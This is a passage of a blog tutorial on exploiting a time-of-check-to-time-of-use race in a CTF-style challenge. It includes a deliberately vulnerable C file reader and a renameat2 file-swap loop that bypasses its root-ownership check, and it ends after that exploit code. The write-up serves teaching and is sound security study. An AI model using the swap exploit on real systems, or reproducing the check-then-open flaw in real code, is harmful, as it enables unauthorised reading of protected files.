<!DOCTYPE html><html lang="en" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="generator" content="Jekyll v4.3.1" /><meta property="og:title" content="Winning Race Conditions" /><meta name="author" content="Saket Upadhyay" /><meta property="og:locale" content="en" /><meta name="description" content="Introduction to Race Condition Vulnerability and how to Exploit them." /><meta property="og:description" content="Introduction to Race Condition Vulnerability and how to Exploit them." /><link rel="canonical" href="/blog/posts/Winning-Race-Conditions/" /><meta property="og:url" content="/blog/posts/Winning-Race-Conditions/" /><meta property="og:site_name" content="Saket’s Blog" /><meta property="og:image" content="https://miro.medium.com/max/1400/1*rLkHV47bazGNdWza9kPkmQ.png" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2019-12-21T12:12:12+05:30" /><meta name="twitter:card" content="summary_large_image" /><meta property="twitter:image" content="https://miro.medium.com/max/1400/1*rLkHV47bazGNdWza9kPkmQ.png" /><meta property="twitter:title" content="Winning Race Conditions" /><meta name="twitter:site" content="@saketofcyber" /><meta name="twitter:creator" content="@saketofcyber" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Saket Upadhyay","url":"https://github.com/Saket-Upadhyay/"},"dateModified":"2019-12-21T12:12:12+05:30","datePublished":"2019-12-21T12:12:12+05:30","description":"Introduction to Race Condition Vulnerability and how to Exploit them.","headline":"Winning Race Conditions","image":"https://miro.medium.com/max/1400/1*rLkHV47bazGNdWza9kPkmQ.png","mainEntityOfPage":{"@type":"WebPage","@id":"/blog/posts/Winning-Race-Conditions/"},"url":"/blog/posts/Winning-Race-Conditions/"}</script><title>Winning Race Conditions | Saket's Blog</title><link rel="apple-touch-icon" sizes="180x180" href="/blog/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/blog/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/blog/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/blog/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/blog/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="Saket's Blog"><meta name="application-name" content="Saket's Blog"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/blog/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://cdn.jsdelivr.net" ><link rel="dns-prefetch" href="https://cdn.jsdelivr.net" ><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/blog/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get MODE_ATTR() { return "data-mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } static get ID() { return "mode-toggle"; } constructor() { if (this.hasMode) { if (this.isDarkMode) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } let self = this; /* always follow the system prefers */ this.sysDarkPrefers.addEventListener("change", () => { if (self.hasMode) { if (self.isDarkMode) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } self.notify(); }); } /* constructor() */ get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode === ModeToggle.DARK_MODE; } get isLightMode() { return this.mode === ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } /* get the current mode on screen */ get modeStatus() { if (this.isDarkMode || (!this.hasMode && this.isSysDarkPrefer)) { return ModeToggle.DARK_MODE; } else { return ModeToggle.LIGHT_MODE; } } setDark() { $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_ATTR); sessionStorage.removeItem(ModeToggle.MODE_KEY); } /* Notify another plugins that the theme mode has changed */ notify() { window.postMessage({ direction: ModeToggle.ID, message: this.modeStatus }, "*"); } } /* ModeToggle */ const toggle = new ModeToggle(); function flipMode() { if (toggle.hasMode) { if (toggle.isSysDarkPrefer) { if (toggle.isLightMode) { toggle.clearMode(); } else { toggle.setLight(); } } else { if (toggle.isDarkMode) { toggle.clearMode(); } else { toggle.setDark(); } } } else { if (toggle.isSysDarkPrefer) { toggle.setLight(); } else { toggle.setDark(); } } toggle.notify(); } /* flipMode() */ </script><body data-spy="scroll" data-target="#toc" data-topbar-visible="true"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/blog/" class="mx-auto"> <img src="/blog/assets/prof.jpg" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/blog/">Saket's Blog</a></div><div class="site-subtitle font-italic">CS Ph.D. Student @ UVa</div></div><ul class="w-100"><li class="nav-item"> <a href="/blog/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/blog/about/" class="nav-link"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a><li class="nav-item"> <a href="/blog/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/blog/tags/" class="nav-link"> <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/blog/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <button class="mode-toggle btn" aria-label="Switch Mode"> <i class="fas fa-adjust"></i> </button> <span class="icon-border"></span> <a href="https://github.com/Saket-Upadhyay" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github"></i> </a> <a href="https://twitter.com/saketofcyber" aria-label="twitter" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href="https://www.linkedin.com/in/saketupadhyay/" aria-label="linkedin" target="_blank" rel="noopener"> <i class="fab fa-linkedin"></i> </a></div></div><div id="topbar-wrapper"><div id="topbar" class="container d-flex align-items-center justify-content-between h-100 pl-3 pr-3 pl-md-4 pr-md-4"> <span id="breadcrumb"> <span> <a href="/blog/"> Home </a> </span> <span>Winning Race Conditions</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper" class="d-flex justify-content-center"><div id="main" class="container pl-xl-4 pr-xl-4"><div class="row"><div id="core-wrapper" class="col-12 col-lg-11 col-xl-9 pr-xl-4"><div class="post pl-1 pr-1 pl-md-2 pr-md-2"><h1 data-toc-skip>Winning Race Conditions</h1><div class="post-meta text-muted"> <span> Posted <em class="" data-ts="1576910532" data-df="ll" data-toggle="tooltip" data-placement="bottom"> Dec 21, 2019 </em> </span><div class="d-flex justify-content-between"> <span> By <em> <a href="https://github.com/Saket-Upadhyay/">Saket Upadhyay</a> </em> </span><div> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="1763 words"> <em>9 min</em> read</span></div></div></div><div class="post-content"><div class="message"> Introduction to Race Condition Vulnerability and how to Exploit them.</div><p>One fine day, someone, somewhere was absorbing random knowledge from the “great internet forums” and stumbled on a CTF challenge remake.</p><p>The challenge was to read the flag from a file [duh… “capture the FLAG(CTF)”]… but here the file was owned by root user and the programs checks for the same and if it is so, then it will not read it for us.</p><p>This actually took me hours of screaming and existential crisis, and then after looking at naked code for long enough with extensive internet researches, I found the solution (or the solution found me?). Anyways, this was cool enough for me to share with you, so here we go with an article.</p><h3 id="so-what-its-all-about"><span class="mr-2">So what it’s all about?</span><a href="#so-what-its-all-about" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3><p><code class="language-plaintext highlighter-rouge">TL;DR :</code> If the computer program tries to check for some condition more than once, we try to change the state of the condition in between two? transfers in attempt to deceive the program into behaving in the way we want or it’s not supposed to work. if you want to skip, <a href="#exp">jump to EXPLOIT</a> section</p><p><img data-src="https://miro.medium.com/max/1000/1*2I7e7fdKmE9JOBmSEJHrPQ.png" alt="Joke_Image.png" title="It's supposed to be funny" data-proofer-ignore></p><p>In technical terms,</p><blockquote><p>“A <strong>race condition</strong> or <strong>race hazard</strong> is the condition of an electronics, software, or other system where the system’s substantive behavior is dependent on the sequence or timing of other uncontrollable events. It becomes a bug when one or more of the possible behaviors is undesirable.” — <a href="https://en.wikipedia.org/wiki/Race_condition">WikiPedia</a></p></blockquote><p>In the light of computer security,</p><p>“In software development, <strong>time-of-check to time-of-use (TOCTOU, TOCTTOU or TOC/TOU)</strong> is a class of software bugs caused by a race condition involving the checking of the state of a part of a system (such as a security credential) and the use of the results of that check.”</p><p>— says… guess who? …. <a href="https://en.wikipedia.org/wiki/Race_condition">WikiPedia</a>, ofc.</p><p>Let’s try to understand this while attempting to do the challenge we got.</p><hr /><h3 id="recreating-the-challenge"><span class="mr-2">Recreating the challenge.</span><a href="#recreating-the-challenge" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3><p>Let’s first recreate the challenge in our own machine, so that we can try it while reading this article… cool? let’s go…</p><ul><li>We will be using Linux for all the things, ’cause Linux is Love. If you are already working on Linux just go on, you are doing great in life, if otherwise, you can use virtual machine for this tutorial and we are good.</ul><h4 id="step-1"><span class="mr-2">Step 1:</span><a href="#step-1" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4><p>Let’s create a file with root ownership which will create our flag. We can do this by following commands :</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre><span class="nb">echo</span> <span class="s2">"{th1s_fl@g_i5_wh@7_w3_s33k}"</span> <span class="o">&gt;</span> flag.txt
<span class="nb">chown </span>root:root flag.txt
</pre></table></code></div></div><p><img data-src="https://miro.medium.com/max/1400/1*pzsDxvYtEwgoDFNUV7OS7Q.png" alt="ScreenShot.png" title="ScreenShot" data-proofer-ignore></p><h4 id="step-2"><span class="mr-2">Step 2:</span><a href="#step-2" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4><p>Here’s the <strong><em>C code</em></strong> of challenge binary, used to read the root flag.txt</p><div class="language-c highlighter-rouge"><div class="code-header"> <span data-label-text="C"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre><td class="rouge-code"><pre><span class="cp">#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/types.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/stat.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;fcntl.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;errno.h&gt;</span><span class="cp">
</span><span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span><span class="o">*</span> <span class="n">argv</span><span class="p">[]){</span><span class="kt">int</span> <span class="n">fd</span><span class="p">;</span><span class="kt">int</span> <span class="n">size</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span><span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="k">if</span><span class="p">(</span><span class="n">argc</span> <span class="o">!=</span> <span class="mi">2</span><span class="p">){</span><span class="n">printf</span><span class="p">(</span><span class="s">"usage: %s &lt;file&gt;</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span><span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);}</span>
<span class="k">struct</span> <span class="n">stat</span> <span class="n">stat_data</span><span class="p">;</span>
<span class="k">if</span><span class="p">(</span><span class="n">stat</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span><span class="o">&amp;</span><span class="n">stat_data</span><span class="p">)</span><span class="o">&lt;</span><span class="mi">0</span><span class="p">){</span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Failed to stat %s: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">strerror</span><span class="p">(</span><span class="n">errno</span><span class="p">));</span><span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);}</span>
<span class="k">if</span><span class="p">(</span><span class="n">stat_data</span><span class="p">.</span><span class="n">st_uid</span> <span class="o">==</span> <span class="mi">0</span><span class="p">){</span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"File %s is owned by root</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span><span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);}</span>
<span class="n">fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">O_RDONLY</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="n">fd</span> <span class="o">&lt;=</span> <span class="mi">0</span><span class="p">)</span>
<span class="p">{</span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Couldn’t open %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span><span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);}</span>
<span class="k">do</span> <span class="p">{</span><span class="n">size</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span><span class="n">write</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="n">size</span><span class="p">);}</span><span class="k">while</span><span class="p">(</span><span class="n">size</span><span class="o">&gt;</span><span class="mi">0</span><span class="p">);}</span>
</pre></table></code></div></div><p>I know ! I know ! This is some aggressively jotted down code chunk and yes, but it works and it’s just packed by removing all unnecessary spaces and indentation.</p><p>For now just copy it can paste in a *.c file and this will work.</p><p><img data-src="https://miro.medium.com/max/1400/1*J053Ay9Fe54ll59jXGvh8Q.png" alt="" data-proofer-ignore></p><p>after compiling we get the following behaviour from our program…</p><p><img data-src="https://miro.medium.com/max/1400/1*a6dcj44480Ugl9-LmSyKLg.png" alt="" data-proofer-ignore></p><p>But we want it to somehow show the contents of the file, and that’s what we will try to do, but first let’s see what the program is actually doing and what we understand from it.</p><h3 id="dissection-of-c-code"><span class="mr-2">Dissection of C Code</span><a href="#dissection-of-c-code" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3><p>Here’s beautified code for you,</p><div class="language-c highlighter-rouge"><div class="code-header"> <span data-label-text="C"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
</pre><td class="rouge-code"><pre><span class="cp">#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/types.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/stat.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;fcntl.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;errno.h&gt;</span><span class="cp">
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span><span class="o">*</span> <span class="n">argv</span><span class="p">[])</span> <span class="p">{</span>
    <span class="kt">int</span> <span class="n">fd</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">size</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>

    <span class="k">if</span><span class="p">(</span><span class="n">argc</span> <span class="o">!=</span> <span class="mi">2</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"usage: %s &lt;file&gt;</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span>
        <span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">struct</span> <span class="n">stat</span> <span class="n">stat_data</span><span class="p">;</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">stat</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">stat_data</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Failed to stat %s: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">strerror</span><span class="p">(</span><span class="n">errno</span><span class="p">));</span>
        <span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">if</span><span class="p">(</span><span class="n">stat_data</span><span class="p">.</span><span class="n">st_uid</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"File %s is owned by root</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span>
        <span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="n">fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">O_RDONLY</span><span class="p">);</span>
    
    <span class="k">if</span><span class="p">(</span><span class="n">fd</span> <span class="o">&lt;=</span> <span class="mi">0</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Couldn't open %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span>
        <span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">do</span> <span class="p">{</span>
        <span class="n">size</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
        <span class="n">write</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="n">size</span><span class="p">);</span>
    <span class="p">}</span> <span class="k">while</span><span class="p">(</span><span class="n">size</span><span class="o">&gt;</span><span class="mi">0</span><span class="p">);</span>

<span class="p">}</span>
</pre></table></code></div></div><p><a href="https://gist.github.com/Saket-Upadhyay/6f1c5e15c2b454d81f7826b64ae1df2d/raw/d7c083a03cce749158726b4131d1e50ab03e615f/raceconditionchallenge.c">View Raw on GitHub</a></p><p>Now, let’s try to understand its workings,</p><p><strong>Line 1 to 6</strong> are just imports.(all hail header files)</p><p><strong>Line 9,10,11</strong> declares some obvious variables.</p><p>Now we can see that we have 4 conditions before line 38 which will actually display the contents of the file. Let’s try to understand these.</p><p><strong>At line 13</strong>, we have condition to check if the given arguments to the program equals “two” or not. actually that means we have to provide one file in the arguments, the other argument is just the program itself given by default. So according to this if we don’t provide a file to read this will execute</p><div class="language-c highlighter-rouge"><div class="code-header"> <span data-label-text="C"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="n">printf</span><span class="p">(</span><span class="s">"usage: %s &lt;file&gt;</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span>
</pre></table></code></div></div><p>and then exit.</p><p><img data-src="https://miro.medium.com/max/1400/1*5FzFVOSl4vsYHjVTd9WzDg.png" alt="" data-proofer-ignore></p><p>At <strong>line 19</strong>, we check if the file contains valid formatted data or not, we can see in <strong>line 18</strong> we defined object for <strong>stat</strong> structure from <strong>sys/stat.h</strong> header. In line 19 “if” condition we just check if we are able to extract information from the supplied file or not. If not, then we execute</p><div class="language-c highlighter-rouge"><div class="code-header"> <span data-label-text="C"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Failed to stat %s: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">strerror</span><span class="p">(</span><span class="n">errno</span><span class="p">));</span>
</pre></table></code></div></div><p>which will print error message in standard error out and then exit.</p><p><a href="https://pubs.opengroup.org/onlinepubs/007908799/xsh/sysstat.h.html">pubs.opengroup.org/onlinepubs/007908799/xsh/sysstat.h.html</a></p><p>At line 24, we check if the file is owned by root or not by checking the uid of the file. What’s UID ? check the link below…</p><p><a href="https://geek-university.com/linux/uid-user-identifier-gid-group-identifier/">UID AND GID IN LINUX</a></p><p>The last check is at <strong>Line 32</strong>, just checks if we are able to successfully open the file as read only or not. Notice that file open at Line 30? it’s there to check for that only, no big deal here.</p><h4 id="overall-working-"><span class="mr-2">Overall working :</span><a href="#overall-working-" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4><p>The program takes one argument as the file we want to open and then it will check if it’s a valid file or not and then checks for root ownership, and then if not owned by root it will try to open it as read only and then if successful in that it will show the contents.</p><h3 id="what-we-need-to-do"><span class="mr-2">What we need to do?</span><a href="#what-we-need-to-do" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3><p>According to above information if we somehow convince the program that the file is not root we might be able to see the contents of the file, because this is the only barrier that out file has, it’s owned by root all other checks are just kind-of integrity checks.</p><h4 id="finding-the-race-condition-flaw"><span class="mr-2">Finding the race condition flaw</span><a href="#finding-the-race-condition-flaw" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4><p>Now let’s see where’s the bug that we were talking about actually is…</p><p>Here we need to focus… let’s examine the flow of the program again, and we can see that it uses <strong>argument argv[1]</strong> two times in the file at significant interval.</p><p>once at Line 19 :</p><pre><code class="language-C">if (stat(argv[1], &amp;stat_data) &lt; 0) {
</code></pre><p>And then in Line 30 :</p><div class="language-c highlighter-rouge"><div class="code-header"> <span data-label-text="C"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="n">fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">O_RDONLY</span><span class="p">);</span>
</pre></table></code></div></div><p>Interestingly, <strong>it check for the root ownership with the first use</strong> and then actually opens the file to <strong>display the contents from second usage.</strong></p><p>Now imagine if we are able to change the file in between two uses of the argument we might be able to tell the program that the file is not owned by root and then pass on the file owned by root to open !!</p><p>Let’s try to understand this with a diagram.</p><p><img data-src="https://miro.medium.com/max/1400/1*rLkHV47bazGNdWza9kPkmQ.png" alt="" data-proofer-ignore></p><div id="exp"></div><h3 id="the-exploit"><span class="mr-2">The Exploit</span><a href="#the-exploit" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3><p>To exploit this vulnerability, we need to quickly swap the files before the other function calls it.</p><p>After watching lots and lots of tutorials on system calls, Linux file management etc. in hopes to find any solution to this, eventually bumped into one.</p><p>Okay, so we are going to use following things in our exploit</p><ul><li>SYS_renameat2 [Systemcall] : <a href="http://man7.org/linux/man-pages/man2/rename.2.html">MAN7.ORG/LINUX/MAN-PAGES</a></ul><p>Our idea is to swap / rename the two files so fast that we are able to pull off above described maneuver.</p><p>Here is a small C code that can help us do that :</p><div class="language-c highlighter-rouge"><div class="code-header"> <span data-label-text="C"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre><td class="rouge-code"><pre><span class="cp">#define _GNU_SOURCE
#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;fcntl.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/syscall.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;linux/fs.h&gt;</span><span class="cp">
</span>
<span class="c1">// source https://github.com/sroettger/35c3ctf_chals/blob/master/logrotate/exploit/rename.c</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">argv</span><span class="p">[])</span> <span class="p">{</span>
  <span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">syscall</span><span class="p">(</span><span class="n">SYS_renameat2</span><span class="p">,</span> <span class="n">AT_FDCWD</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">AT_FDCWD</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="n">RENAME_EXCHANGE</span><span class="p">);</span>
  <span class="p">}</span>
  <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
